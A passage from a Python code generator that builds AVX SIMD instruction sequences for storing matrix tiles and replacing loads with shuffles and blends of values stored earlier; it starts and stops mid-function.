newrows.append( mm256Permute2f128Ps(trow2, trow6, [0,0,1,0,0,0,0,0]) )
newrows.append( mm256Permute2f128Ps(trow3, trow7, [0,0,1,0,0,0,0,0]) )
newrows.append( mm256Permute2f128Ps(trow0, trow4, [0,0,1,1,0,0,0,1]) )
newrows.append( mm256Permute2f128Ps(trow1, trow5, [0,0,1,1,0,0,0,1]) )
newrows.append( mm256Permute2f128Ps(trow2, trow6, [0,0,1,1,0,0,0,1]) )
newrows.append( mm256Permute2f128Ps(trow3, trow7, [0,0,1,1,0,0,0,1]) )
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
instructions += [ mm256StoreGs(newrows[i], pcs[i], range(nu)) for i in range(nu) ]
return instructions
class _Flt8Storer(Storer):
def __init__(self):
super(_Flt8Storer, self).__init__()
def storeMatrix(self, mParams):
nu=8
src, dst = mParams['nuM'], mParams['m']
sL, sR = mParams['nuML'], mParams['nuMR']
dL, dR = mParams['mL'], mParams['mR']
M, N = mParams['M'], mParams['N']
nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
isCompact = mParams['compact']
instructions = [ Comment(str(nuMM) + "x" + str(nuMN) + " -> " + str(M) + "x" + str(N)) ]
if M == 1 and N == 1:
pc = AddressOf(sa(dst[dL.of(0),dR.of(0)]))
va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
instr = mm256StoreGs(va, pc,[0])
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
instr = mm256StoreGs(va, pc, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
# if isCompact:
# pc = Pointer(dst[dL.of(0),dR.of(0)])
# if max(M,N) < nu:
# vmask = max(M,N)*[1] + (nu-max(M,N))*[0]
# instrs = [ mm256MaskstorePs(vmask, va, pc) ]
# else:
# instrs = [ mm256StoreuPs(va, pc) ]
# else:
# vmask = [1] + 7*[0]
# pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
# instrs = []
# if M == 2:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (2,2,2,1)), pcs[1]) )
# elif M==3:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (3,3,3,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (3,3,3,2)), pcs[2]) )
# elif M==4:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
# elif M==5:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
# lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
# instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
# elif M==6:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
# lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
# instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (2,2,2,1)), pcs[5]) )
# elif M==7:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
# lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
# instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,1)), pcs[5]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,2)), pcs[6]) )
# elif M==8:
# instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
# lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
# instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,1)), pcs[5]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,2)), pcs[6]) )
# instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,3)), pcs[7]) )
instructions += [ instr ]
elif (M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGs(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(M) ]
# if N < nu:
# vmask = N*[1] + (nu-N)*[0]
# instrs = [ mm256MaskstorePs(vmask, vas[i], pcs[i]) for i in range(M) ]
# else:
instrs = [ mm256StoreGs(vas[i], pcs[i], range(N)) for i in range(M) ]
instructions += instrs
return instructions
class AVXLoadReplacer(LoadReplacer):
def __init__(self, opts):
super(AVXLoadReplacer, self).__init__(opts)
def mm256BroadcastSd(self, src, repList):
sList = sorted(repList, key=lambda t: t[0], reverse=True)
dst = sList[0][1]
if dst.reglen == 4 and dst.mrmap == [0,1,2,3]:
# at = src.pointer.getAt()
# direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
# lane1, posInLane = at[direct] > 1, at[direct] % 2
# immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
# dupLane = mm256Permute2f128Pd(mm256LoaduPd(dst.pointer), mm256LoaduPd(dst.pointer), immBitList) # Dup the lane where we can find the value
# return mm256ShufflePd(dupLane, dupLane, [posInLane]*4)
dupx2 = mm256UnpackloPd(mm256LoaduPd(dst.pointer), mm256LoaduPd(dst.pointer))
return mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,0,0,0,0,0]) # Dup first lane
def mm256LoadGd(self, src, repList, bounds):
#src is the mm256LoadGd we want to replace with combinations of elements from previous stores in repList
# if src.pointer._ref.physLayout.name == 'C' and src.pointer.at == (0,8) and src.mrmap == [0]:
# pass
list_by_line = sorted(repList, key=lambda t: t[0], reverse=True)
dsts_by_line = [ t[1] for t in list_by_line ]
src_dsts_map = self.src_dsts_map(src, dsts_by_line)
if len(src_dsts_map) > 1:
dsts = [ t[2] for t in src_dsts_map ]
if len(src_dsts_map) == 4 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[0]),([3],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for i in range(4):
notums[i][dsts[i].mrmap.index(0)] = False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(4) ]
shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
shuf_2nd = mm256UnpackloPd(ld_dsts[2], ld_dsts[3])
# blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
# return blend_1st_2nd
return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
elif len(src_dsts_map) == 4 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1]),([2],[0]),([3],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for i,p in enumerate([2,1,0,0]):
notums[i][dsts[i].mrmap.index(p)] = False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(4) ]
shuf_2nd = mm256UnpackloPd(ld_dsts[2], ld_dsts[3])
perm = mm256Permute2f128Pd(ld_dsts[0], shuf_2nd, [0,0,1,0,0,0,0,1])
return mm256BlendPd(perm, ld_dsts[1], [0,0,1,0])
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for i in range(3):
notums[i][dsts[i].mrmap.index(0)] = False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(3) ]
shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
shuf_2nd = mm256UnpackloPd(ld_dsts[2], mm256SetzeroPd())
# blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
# return blend_1st_2nd
return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[0]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for i,p in enumerate([1,0,0]):
notums[i][dsts[i].mrmap.index(p)] = False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(3) ]
shuf_1st = mm256ShufflePd(ld_dsts[0], ld_dsts[1], [0,0,0,1])
shuf_2nd = mm256UnpackloPd(ld_dsts[2], mm256SetzeroPd())
return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2,3],[1,2])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
notums[0][dsts[0].mrmap.index(0)] = False
notums[1][dsts[1].mrmap.index(0)] = False
for p in [1,2]:
notums[2][dsts[2].mrmap.index(p)] = False
ld_dst2 = mm256LoadGd(dsts[2].pointer, dsts[2].mrmap, isCompact=dsts[2].isCompact, horizontal=dsts[2].horizontal, not_using_mask=notums[2])
immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
inter_lane = mm256Permute2f128Pd(ld_dst2, ld_dst2, immBitList)
shuf_1st = mm256ShufflePd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), \
mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1]), [0,0,0,0])
shuf_2nd = mm256ShufflePd(inter_lane, ld_dst2, [0,1,0,0])
blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
return blend_1st_2nd
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[1])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
notums[0][dsts[0].mrmap.index(0)] = False
notums[1][dsts[1].mrmap.index(0)] = False
notums[2][dsts[2].mrmap.index(1)] = False
ld_dst2 = mm256LoadGd(dsts[2].pointer, dsts[2].mrmap, isCompact=dsts[2].isCompact, horizontal=dsts[2].horizontal, not_using_mask=notums[2])
immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
inter_lane = mm256Permute2f128Pd(ld_dst2, ld_dst2, immBitList)
shuf_1st = mm256UnpackloPd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), \
mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1]))
shuf_2nd = mm256UnpackhiPd(inter_lane, mm256SetzeroPd())
blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
return blend_1st_2nd
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[3]),([1],[3]),([2],[3])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum in zip(dsts,notums):
notum[dst.mrmap.index(3)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
immBitList = [1,0,0,0,0,0,0,1]
perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds[:2] ]
shuf1 = mm256UnpackhiPd(perms_lane[0], perms_lane[1])
shuf2 = mm256UnpackhiPd(lds[2], mm256SetzeroPd())
blend = mm256BlendPd(shuf1, shuf2, [1,1,0,0])
return blend
elif len(src_dsts_map) ==3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum,p in zip(dsts,notums,[2,1,0]):
notum[dst.mrmap.index(p)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
perm_lane02 = mm256Permute2f128Pd(lds[0], lds[2], [0,0,1,0,0,0,0,1])
blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,1,0])
load_rep = mm256BlendPd(perm_lane02, blend1, [1,0,1,0])
return load_rep
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[2]), ([3],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for p in [0,1]:
notums[0][dsts[0].mrmap.index(p)] = False
notums[1][dsts[1].mrmap.index(2)] = False
notums[2][dsts[2].mrmap.index(0)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
perm = mm256Permute2f128Pd(lds[0], lds[2], [0,0,1,0,0,0,0,0])
shuf = mm256ShufflePd(perm, perm, [0,0,1,0])
return mm256BlendPd(lds[1], shuf, [1,0,1,1])
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[1]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for d,p in [(0,0),(1,1),(2,0)]:
notums[d][dsts[d].mrmap.index(p)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
blend01 = mm256BlendPd(lds[0], lds[1], [0,0,1,0])
perm = mm256Permute2f128Pd(blend01, lds[2], [0,0,1,0,0,0,0,0])
return mm256BlendPd(perm, mm256SetzeroPd(), [1,0,0,0])
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum,p in zip(dsts,notums,[1,0]):
notum[dst.mrmap.index(p)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
blend_lds = [ mm256BlendPd(ld, mm256SetzeroPd(), [1,1,0,0]) for ld in lds ]
shuf = mm256ShufflePd(blend_lds[0], blend_lds[1], [0,0,0,1])
return shuf
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[1])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum in zip(dsts,notums):
notum[dst.mrmap.index(1)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
blend_lds = [ mm256BlendPd(ld, mm256SetzeroPd(), [1,1,0,0]) for ld in lds ]
shuf = mm256UnpackhiPd(blend_lds[0], blend_lds[1])
return shuf
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[3]),([1],[3])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum in zip(dsts,notums):
notum[dst.mrmap.index(3)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
immBitList = [1,0,0,0,0,0,0,1]
perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds ]
shuf = mm256UnpackhiPd(perms_lane[0], perms_lane[1])
return shuf
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1,2],[0,1])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
notums[0][dsts[0].mrmap.index(0)] = False
for p in [0,1]:
notums[1][dsts[1].mrmap.index(p)] = False
ld_dst1 = mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1])
immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
inter_lane = mm256Permute2f128Pd(ld_dst1, ld_dst1, immBitList)
shuf_1st = mm256UnpackloPd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), ld_dst1)
# shuf_1st = mm256ShufflePd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap), mm256LoadGd(dsts[1].pointer, dsts[1].mrmap), [0,0,0,0])
shuf_2nd = mm256UnpackhiPd(inter_lane, mm256SetzeroPd())
blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
return blend_1st_2nd
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for p in [0,1]:
notums[0][dsts[0].mrmap.index(p)] = False
notums[1][dsts[1].mrmap.index(0)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,0,1])
inter_lane = mm256Permute2f128Pd(blend1, blend1, [0,0,0,0,1,0,0,0])
return mm256BlendPd(lds[0], inter_lane, [1,1,0,0])
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1,2],[0,1,2]),([3],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for p in [0,1,2]:
notums[0][dsts[0].mrmap.index(p)] = False
notums[1][dsts[1].mrmap.index(0)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
perm = mm256Permute2f128Pd(lds[1], lds[1], [0,0,0,0,1,0,0,0])
shuf = mm256ShufflePd(perm, perm, [0,0,0,0])
return mm256BlendPd(lds[0], shuf, [1,0,0,0])
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[0])]) ]):
sys.exit("replacement under construction")
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum,p in zip(dsts,notums,[2,0]):
notum[dst.mrmap.index(p)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
immBitList = [1,0,0,0,0,0,0,1]
perm_lane = mm256Permute2f128Pd(lds[0], lds[0], immBitList)
load_rep = mm256BlendPd(perm_lane, lds[1], [0,0,1,0])
return load_rep
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum,p in zip(dsts,notums,[2,1]):
notum[dst.mrmap.index(p)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
immBitList = [1,0,0,0,0,0,0,1]
perm_lane = mm256Permute2f128Pd(lds[0], lds[0], immBitList)
load_rep = mm256BlendPd(perm_lane, lds[1], [0,0,1,0])
return load_rep
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[2])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for dst,notum in zip(dsts,notums):
notum[dst.mrmap.index(2)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
immBitList = [1,0,0,0,0,0,0,1]
perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds ]
shuf = mm256UnpackloPd(perms_lane[0], perms_lane[1])
return shuf
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
for i in range(2):
notums[i][dsts[i].mrmap.index(0)] = False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(2) ]
shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
blend_1st_zeros = mm256BlendPd(shuf_1st, mm256SetzeroPd(), [1,1,0,0])
return blend_1st_zeros
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[2])]) ]): #Like single map, dist==-1
notums = [ [True]*len(dst.mrmap) for dst in dsts ]
notums[0][1], notums[1][2] = False, False
ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(2) ]
lane_perm = mm256Permute2f128Pd(ld_dsts[1], ld_dsts[1], [1,0,0,0,0,0,0,1])
blend_dst = mm256BlendPd(mm256SetzeroPd(), ld_dsts[0], [0,0,1,0])
load_rep = mm256ShufflePd(blend_dst, lane_perm, [0,1,0,1])
return load_rep
elif dsts[-1] is None:
if len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([0],[0]) ]) ]): #Blending
dst = dsts[0]
dnotum = [True]*len(dst.mrmap)
dnotum[0] = False
ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
src.not_using_mask[0] = True
imm_list = [0]*dst.reglen
imm_list[dst.reglen-1] = 1
return mm256BlendPd(src, ld_dst, imm_list)
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([0],[1]) ]) ]):
dst = dsts[0]
dnotum = [True]*len(dst.mrmap)
dnotum[1] = False
ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
blend_dst = mm256BlendPd(src, ld_dst, [0,0,1,0])
src.not_using_mask[0] = True
return mm256ShufflePd(blend_dst, src, [1,0,1,1])
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([1],[0]) ]) ]):
dst = dsts[0]
dnotum = [True]*len(dst.mrmap)
dnotum[0] = False
ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
blend_dst = mm256BlendPd(src, ld_dst, [0,0,0,1])
src.not_using_mask[1] = True
return mm256ShufflePd(src, blend_dst, [1,0,0,0])
elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([1],[1]) ]) ]):
dst = dsts[0]
dnotum = [True]*len(dst.mrmap)
dnotum[1] = False
ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
src.not_using_mask[1] = True
imm_list = [0]*dst.reglen
imm_list[-2] = 1
return mm256BlendPd(src, ld_dst, imm_list)
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[2])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts[:2] ]
for p in [0,1]:
notums[0][dsts[0].mrmap.index(p)] = False
notums[1][dsts[1].mrmap.index(2)] = False
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
src.not_using_mask[:3] = [True]*3
blend_dsts = mm256BlendPd(lds[0], lds[1], [0,1,0,0])
return mm256BlendPd(blend_dsts, src, [1,0,0,0])
elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([1],[1]),([2],[0])]) ]):
notums = [ [True]*len(dst.mrmap) for dst in dsts[:-1] ]
notums[0][dsts[0].mrmap.index(1)] = False
notums[1][dsts[1].mrmap.index(0)] = False
src.not_using_mask[1:3] = [True]*2
lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts[:-1],notums) ]
imm_list = [0]*dsts[0].reglen
imm_list[-2] = 1
blend0 = mm256BlendPd(src, lds[0], imm_list)
blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,0,1])
inter_lane = mm256Permute2f128Pd(blend1, blend1, [0,0,0,0,1,0,0,0])
return mm256BlendPd(blend0, inter_lane, [0,1,0,0])
else:
src_dsts_map = self.src_dsts_map(src, dsts_by_line)
raise Exception('Cannot load-replace when dst is None!')
else:
src_dsts_map = self.src_dsts_map(src, dsts_by_line)
raise Exception('len(src_dsts_map) > 1: Cannot load-replace!')
else:
src_reg_pos, dst_reg_pos, dst = src_dsts_map[0]
notum = [True]*len(dst.mrmap)
for p in dst_reg_pos:
notum[dst.mrmap.index(p)] = False
ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum)
imm_list = [0]*dst.reglen
for pos in dst_reg_pos:
imm_list[dst.reglen-1-pos] = 1
blend_dst = mm256BlendPd(mm256SetzeroPd(), ld_dst, imm_list)
if src.reglen == 4 and len(src_reg_pos) == 1 and src_reg_pos[0] == tuple(range(4)): #Analogous of bcast with genLoad
lane1, posInLane = dst_reg_pos[0] > 1, dst_reg_pos[0] % 2
immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
dupLane = mm256Permute2f128Pd(ld_dst, ld_dst, immBitList) # Dup the lane where we can find the value
return mm256ShufflePd(dupLane, dupLane, [posInLane]*4)
elif src_reg_pos == dst_reg_pos:
return blend_dst
elif len(set([s-d for s,d in zip(src_reg_pos, dst_reg_pos)])) == 1: # shifting
dist = src_reg_pos[0] - dst_reg_pos[0]
if len(src.mrmap) == 1 and (all([p>1 for p in src_reg_pos+dst_reg_pos]) or all([p<2 for p in src_reg_pos+dst_reg_pos])):
# No cross-lane shift
if dist == 1:
load_rep = mm256UnpackloPd(mm256SetzeroPd(), blend_dst)
elif dist == -1:
load_rep = mm256UnpackhiPd(blend_dst, mm256SetzeroPd())
return load_rep
if dist > 0:
